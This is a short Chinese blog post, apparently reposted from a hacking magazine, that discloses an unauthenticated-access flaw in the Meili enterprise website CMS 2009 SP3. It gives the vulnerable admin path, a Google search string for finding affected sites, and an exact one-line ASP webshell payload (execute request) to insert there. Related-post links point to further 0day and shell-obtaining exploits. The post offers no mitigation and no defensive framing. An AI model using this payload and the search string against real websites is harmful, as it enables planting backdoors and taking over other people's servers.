魅力企业网站管理系统 2009 SP3 中英繁漏洞

作者：幻泉[B.S.N]
来源：黑客防线

源码下载http://down.chinaz.com/soft/19655.htm
官方网站http://www.melyysoft.com/
漏洞等级：高
Google搜索："0351-6061896"

漏洞说明：
防注入系统未设置登陆导致可以访问插入一句话

插入地址：/SqlIn/sqlIn_admin.asp
插入代码：":execute request("value"):a="

Posted on: 2009, March 17, 6:14 PM | Filed under: 漏洞收集 |
Tags：cms

您可能会对以下文章感兴趣哦

ECShop <= v2.6.2 SQL injection 0day (1748)
浅析LxBlog V6变量未初始化漏洞 (1097)
php168 v2008后台拿shell方法 (1588)
phpcms2008 GBK 双字节编码 0day ask/search_ajax.php (1299)
PHPWind 文件及数据结构相关文档 (1658)
远古视频点播系统的一个注入漏洞 (809)
ShopEx 4.7.2 0day (784)
discuz旗下产品 "视频播客 SupeV 1.0.1" 0day (816)
动易SiteWeaver6.6版最新漏洞利用工具 (958)
ewebeditor v6.0.0版本漏洞 (1085)

Leave a comment